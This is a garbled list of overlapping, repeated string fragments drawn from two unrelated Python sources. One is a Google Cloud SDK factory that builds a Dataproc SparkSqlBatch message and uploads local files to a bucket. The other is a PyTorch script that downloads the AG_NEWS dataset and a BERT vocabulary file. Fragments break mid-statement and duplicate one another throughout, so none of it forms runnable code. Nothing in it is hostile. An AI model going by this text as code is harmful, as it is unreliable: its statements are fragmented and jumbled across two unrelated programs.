"message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket",
"= args.deps_bucket if args.deps_bucket is not None else args.bucket if not bucket: raise",
"the specific language governing permissions and # limitations under the License. \"\"\"Factory class",
"dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs)",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"local files and creates a SparkSqlBatch message. Uploads user local files and change",
"import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory",
"AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script",
"if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket",
"# you may not use this file except in compliance with the License.",
"agreed to in writing, software # distributed under the License is distributed on",
"def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies.",
"(the \"License\"); # you may not use this file except in compliance with",
"\"\"\" kwargs = {} dependencies = {} # Upload requires a list. dependencies['queryFileUri']",
"# Unless required by applicable law or agreed to in writing, software #",
"by applicable law or agreed to in writing, software # distributed under the",
"is required until we figure out a place to upload user files. flags.AddBucket(parser)",
"language governing permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"\"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message.",
"dependencies) # Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0]",
"= None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if",
"file except in compliance with the License. # You may obtain a copy",
"and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__",
"args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,",
"= local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list. dependencies['queryFileUri']",
"and creates a SparkSqlBatch message. Uploads user local files and change the URIs",
"License for the specific language governing permissions and # limitations under the License.",
"= {} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT]",
"to in writing, software # distributed under the License is distributed on an",
"dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the list.",
"import absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py import",
"kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket",
"Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version",
"implied. # See the License for the specific language governing permissions and #",
"a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises:",
"\"License\"); # you may not use this file except in compliance with the",
"= args.jars params = None if args.script_variables: params = args.script_variables elif args.vars: params",
"Args: args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is",
"Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"required to upload local files, but not specified. \"\"\" kwargs = {} dependencies",
"params = None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars",
"requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars:",
"class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args:",
"or implied. # See the License for the specific language governing permissions and",
"Storage bucket to upload workload dependencies. # It is required until we figure",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division from __future__",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc:",
"flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def",
"googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud",
"__future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc",
"args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies)",
"files, but not specified. \"\"\" kwargs = {} dependencies = {} # Upload",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"files and creates a SparkSqlBatch message. Uploads user local files and change the",
"you may not use this file except in compliance with the License. #",
"Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to",
"use this file except in compliance with the License. # You may obtain",
"args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if",
"AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. #",
"AttributeError: Bucket is required to upload local files, but not specified. \"\"\" kwargs",
"script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first",
"for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage",
"# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may",
"# limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import",
"import division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import",
"return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload",
"dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc",
"Cloud Storage bucket to upload workload dependencies. # It is required until we",
"2.0 (the \"License\"); # you may not use this file except in compliance",
"\"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc =",
"params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(",
"coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved. #",
"# It is required until we figure out a place to upload user",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the",
"is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.')",
"instance. Raises: AttributeError: Bucket is required to upload local files, but not specified.",
"# # Unless required by applicable law or agreed to in writing, software",
"__init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\"",
"specific language governing permissions and # limitations under the License. \"\"\"Factory class for",
"class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for",
"local files, but not specified. \"\"\" kwargs = {} dependencies = {} #",
"express or implied. # See the License for the specific language governing permissions",
"from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class",
"= dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def",
"kwargs = {} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] =",
"out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for",
"dependencies. # It is required until we figure out a place to upload",
"args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params =",
"permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from",
"either express or implied. # See the License for the specific language governing",
"not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of",
"Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not",
"an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either",
"message.\"\"\" def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc",
"flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It is",
"to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A",
"SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local files, but",
"the License. # You may obtain a copy of the License at #",
"local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if not",
"# distributed under the License is distributed on an \"AS IS\" BASIS, #",
"is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF",
"flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It",
"absolute_import from __future__ import division from __future__ import unicode_literals from apitools.base.py import encoding",
"def __init__(self, dataproc): \"\"\"Factory class for SparkSqlBatch message. Args: dataproc: A Dataproc instance.",
"= args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params",
"__future__ import division from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc",
"apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader class SparkSqlBatchFactory(object):",
"\"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division",
"{} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] =",
"{} dependencies = {} # Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if",
"with the License. # You may obtain a copy of the License at",
"to local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed",
"# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you",
"-*- coding: utf-8 -*- # # Copyright 2021 Google LLC. All Rights Reserved.",
"import local_file_uploader class SparkSqlBatchFactory(object): \"\"\"Factory class for SparkSqlBatch message.\"\"\" def __init__(self, dataproc): \"\"\"Factory",
"instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates",
"sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket",
"a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris']",
"dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables elif args.vars:",
"args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not",
"law or agreed to in writing, software # distributed under the License is",
"Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if",
"the License for the specific language governing permissions and # limitations under the",
"dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars",
"flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to upload workload dependencies. # It is required",
"on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,",
"# Upload requires a list. dependencies['queryFileUri'] = [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files",
"dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads",
"main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the",
"not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move",
"message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args):",
"if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables",
"Raises: AttributeError: Bucket is required to upload local files, but not specified. \"\"\"",
"from __future__ import unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from",
"Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #",
"args.jars params = None if args.script_variables: params = args.script_variables elif args.vars: params =",
"in compliance with the License. # You may obtain a copy of the",
"License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or",
"is required to upload local files, but not specified. \"\"\" kwargs = {}",
"from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from",
"# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #",
"at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed",
"Uploads user local files and change the URIs to local files to uploaded",
"Move main SQL script out of the list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge",
"specified.') dependencies = local_file_uploader.Upload(args.bucket, dependencies) # Move main SQL script out of the",
"unicode_literals from apitools.base.py import encoding from googlecloudsdk.command_lib.dataproc import flags from googlecloudsdk.command_lib.dataproc import local_file_uploader",
"See the License for the specific language governing permissions and # limitations under",
"BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"= encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is",
"a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required",
"= [args.SQL_SCRIPT] if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params",
"# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in",
"args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] =",
"under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from",
"dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser):",
"self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else",
"URIs to local files to uploaded URIs. Creates a SparkSqlBatch message. Args: args:",
"\"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user local files and",
"class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import division from",
"Version 2.0 (the \"License\"); # you may not use this file except in",
"except in compliance with the License. # You may obtain a copy of",
"args: Parsed arguments. Returns: A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required",
"list. dependencies['queryFileUri'] = dependencies['queryFileUri'][0] # Merge the dictionaries first for compatibility. kwargs.update(dependencies) return",
"# Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the",
"# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"may not use this file except in compliance with the License. # You",
"License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS",
"elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True)",
"the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__",
"if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket if",
"kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser) flags.AddJarFiles(parser) flags.AddSqlScriptVariables(parser) # Cloud Storage bucket to",
"It is required until we figure out a place to upload user files.",
"files to uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns:",
"message. Uploads user local files and change the URIs to local files to",
"Bucket is required to upload local files, but not specified. \"\"\" kwargs =",
"None else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies =",
"to upload local files, but not specified. \"\"\" kwargs = {} dependencies =",
"Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads",
"= args.script_variables elif args.vars: params = args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params,",
"A SparkSqlBatch message instance. Raises: AttributeError: Bucket is required to upload local files,",
"files and change the URIs to local files to uploaded URIs. Creates a",
"dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables:",
"License. \"\"\"Factory class for SparkSqlBatch message.\"\"\" from __future__ import absolute_import from __future__ import",
"A Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files",
"None if args.script_variables: params = args.script_variables elif args.vars: params = args.vars if params:",
"def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and creates a SparkSqlBatch message. Uploads user",
"change the URIs to local files to uploaded URIs. Creates a SparkSqlBatch message.",
"Copyright 2021 Google LLC. All Rights Reserved. # # Licensed under the Apache",
"and change the URIs to local files to uploaded URIs. Creates a SparkSqlBatch",
"for SparkSqlBatch message. Args: dataproc: A Dataproc instance. \"\"\" self.dataproc = dataproc def",
"uploaded URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch",
"params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket = args.deps_bucket if args.deps_bucket is not None",
"Dataproc instance. \"\"\" self.dataproc = dataproc def UploadLocalFilesAndGetMessage(self, args): \"\"\"Uploads local files and",
"governing permissions and # limitations under the License. \"\"\"Factory class for SparkSqlBatch message.\"\"\"",
"if args.deps_bucket is not None else args.bucket if not bucket: raise AttributeError('--deps-bucket was",
"distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT",
"URIs. Creates a SparkSqlBatch message. Args: args: Parsed arguments. Returns: A SparkSqlBatch message",
"else args.bucket if not bucket: raise AttributeError('--deps-bucket was not specified.') dependencies = local_file_uploader.Upload(args.bucket,",
"args.jars: dependencies['jarFileUris'] = args.jars params = None if args.script_variables: params = args.script_variables elif",
"= args.vars if params: kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage( params, self.dataproc.messages.SparkSqlBatch.QueryVariablesValue, sort_items=True) if local_file_uploader.HasLocalFiles(dependencies): bucket",
"if args.jar_files: dependencies['jarFileUris'] = args.jar_files if args.jars: dependencies['jarFileUris'] = args.jars params = None",
"# Merge the dictionaries first for compatibility. kwargs.update(dependencies) return self.dataproc.messages.SparkSqlBatch(**kwargs) def AddArguments(parser): flags.AddMainSqlScript(parser)"
] |
[
"# if __name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\",",
"if __name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\", #",
"it along with the vocab file :param input_options: Input arg parameters \"\"\" dataset_tar",
"os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f:",
"<reponame>sampathkumaran90/pytorch-pipeline<filename>data_prep_step/BERT_PYTORCH/data_prep_bert_pytorch.py import shutil from collections import defaultdict import numpy as np import pandas",
"torch import nn from torch.utils.data import Dataset, DataLoader from transformers import ( BertModel,",
"input_options: Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar)",
"filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content)",
"tqdm import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import",
"import shutil from collections import defaultdict import numpy as np import pandas as",
"PrintOptions(options) run_pipeline( options ) # if __name__ == \"__main__\": # run_pipeline_component({ # \"output\":",
"options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from entry point to execute the",
"with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab",
"import torch.nn.functional as F from sklearn.model_selection import train_test_split from torch import nn from",
"download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse import logging def",
"extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse import logging def run_pipeline(input_options):",
"Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW ) import argparse import",
"to execute the pipeline \"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options)",
"from sklearn.model_selection import train_test_split from torch import nn from torch.utils.data import Dataset, DataLoader",
"shutil from collections import defaultdict import numpy as np import pandas as pd",
") import argparse import os from tqdm import tqdm import requests from torchtext.utils",
"This method downloads the dataset and extract it along with the vocab file",
"file :param input_options: Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files",
"import numpy as np import pandas as pd import torch import torch.nn.functional as",
"input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error",
"import tqdm import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS",
"from transformers import ( BertModel, BertTokenizer, AdamW ) import argparse import os from",
"method downloads the dataset and extract it along with the vocab file :param",
"from torchtext.datasets.text_classification import URLS import sys import argparse import logging def run_pipeline(input_options): \"\"\"",
"argparse import logging def run_pipeline(input_options): \"\"\" This method downloads the dataset and extract",
"dataset and extract it along with the vocab file :param input_options: Input arg",
"options ) # if __name__ == \"__main__\": # run_pipeline_component({ # \"output\": \"./\", #",
"= download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get(",
"import ( BertModel, BertTokenizer, AdamW ) import argparse import os from tqdm import",
"from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ == \"__main__\": #",
"tqdm import tqdm import requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import",
"as F from sklearn.model_selection import train_test_split from torch import nn from torch.utils.data import",
"with the vocab file :param input_options: Input arg parameters \"\"\" dataset_tar = download_from_url(",
"vocab file :param input_options: Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"])",
"vocab file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a in options.items():",
"as pd import torch import torch.nn.functional as F from sklearn.model_selection import train_test_split from",
"the vocab file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a in",
"for a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from entry point",
"downloads the dataset and extract it along with the vocab file :param input_options:",
"requests from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import",
"torchtext.datasets.text_classification import URLS import sys import argparse import logging def run_pipeline(input_options): \"\"\" This",
"import train_test_split from torch import nn from torch.utils.data import Dataset, DataLoader from transformers",
":param input_options: Input arg parameters \"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files =",
"\"\"\" dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer",
"# run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\", # \"VOCAB_FILE_URL\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\" # })",
"import sys import argparse import logging def run_pipeline(input_options): \"\"\" This method downloads the",
"logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ == \"__main__\": # run_pipeline_component({ #",
"a in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from entry point to",
"prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ ==",
"point to execute the pipeline \"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO)",
"container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ == \"__main__\": # run_pipeline_component({",
"import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse import logging",
"run_pipeline(input_options): \"\"\" This method downloads the dataset and extract it along with the",
"in options.items(): print(a) def run_pipeline_component(options): \"\"\" Method called from entry point to execute",
"in fetching the vocab file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for",
"sklearn.model_selection import train_test_split from torch import nn from torch.utils.data import Dataset, DataLoader from",
"root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if",
"def run_pipeline_component(options): \"\"\" Method called from entry point to execute the pipeline \"\"\"",
"dataset_tar = download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer =",
"f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options): \"\"\" Logging",
"\"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) #",
"fetching the vocab file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\" for a",
"torch import torch.nn.functional as F from sklearn.model_selection import train_test_split from torch import nn",
"RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options): \"\"\" Logging for debugging \"\"\"",
"pd import torch import torch.nn.functional as F from sklearn.model_selection import train_test_split from torch",
"pandas as pd import torch import torch.nn.functional as F from sklearn.model_selection import train_test_split",
"\"__main__\": # run_pipeline_component({ # \"output\": \"./\", # \"VOCAB_FILE\": \"bert_base_uncased_vocab.txt\", # \"VOCAB_FILE_URL\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\" #",
"argparse import os from tqdm import tqdm import requests from torchtext.utils import download_from_url,",
"as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options):",
"import logging def run_pipeline(input_options): \"\"\" This method downloads the dataset and extract it",
"import os from tqdm import tqdm import requests from torchtext.utils import download_from_url, extract_archive",
"pipeline \"\"\" print(\"Running data prep job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options )",
"from torchtext.utils import download_from_url, extract_archive from torchtext.datasets.text_classification import URLS import sys import argparse",
"if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok: with open(input_options[\"VOCAB_FILE\"], \"wb\")",
"\"wb\") as f: f.write(filePointer.content) else: raise RuntimeError(\"Error in fetching the vocab file\") def",
"download_from_url( URLS[\"AG_NEWS\"], root=input_options[\"output\"]) extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"],",
"extracted_files = extract_archive(dataset_tar) if not os.path.isfile(input_options[\"VOCAB_FILE\"]): filePointer = requests.get( input_options[\"VOCAB_FILE_URL\"], allow_redirects=True) if filePointer.ok:",
"torch.utils.data import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW ) import",
"extract it along with the vocab file :param input_options: Input arg parameters \"\"\"",
"nn from torch.utils.data import Dataset, DataLoader from transformers import ( BertModel, BertTokenizer, AdamW",
"raise RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options): \"\"\" Logging for debugging",
"job from container\") logging.getLogger().setLevel(logging.INFO) PrintOptions(options) run_pipeline( options ) # if __name__ == \"__main__\":",
"else: raise RuntimeError(\"Error in fetching the vocab file\") def PrintOptions(options): \"\"\" Logging for",
